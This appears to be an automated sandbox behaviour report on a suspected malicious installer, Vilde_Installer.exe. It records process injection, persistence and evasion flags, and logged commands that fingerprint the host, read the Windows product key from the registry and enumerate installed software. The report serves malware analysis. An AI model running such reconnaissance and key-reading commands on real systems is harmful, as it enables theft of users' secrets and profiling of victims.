Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1440 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 1440 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Windows\system32\cmd.exe
PID 2712 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Windows\system32\cmd.exe
PID 3900 wrote to memory of 5068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3900 wrote to memory of 5068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
PID 2712 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Windows\system32\cmd.exe
PID 2712 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Windows\system32\cmd.exe
PID 2712 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Windows\system32\cmd.exe
PID 2712 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Windows\system32\cmd.exe
PID 2712 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Windows\system32\cmd.exe
PID 2712 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Windows\system32\cmd.exe
PID 4788 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4788 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4688 wrote to memory of 3360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4688 wrote to memory of 3360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3360 wrote to memory of 4468 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3360 wrote to memory of 4468 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4420 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4420 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4420 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4420 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2712 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Windows\system32\cmd.exe
PID 2712 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Windows\system32\cmd.exe
PID 1944 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1944 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1944 wrote to memory of 5108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 1944 wrote to memory of 5108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2712 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Windows\system32\cmd.exe
PID 2712 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe C:\Windows\system32\cmd.exe
PID 2236 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2236 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe

"C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe"

C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe

C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1440 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1440 get ExecutablePath

C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe

"C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\autoantibody" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1988 --field-trial-handle=1992,i,16408176841100345989,15699874884064010324,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe

"C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\autoantibody" --mojo-platform-channel-handle=2172 --field-trial-handle=1992,i,16408176841100345989,15699874884064010324,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1440 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1440 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

C:\Windows\system32\cmd.exe

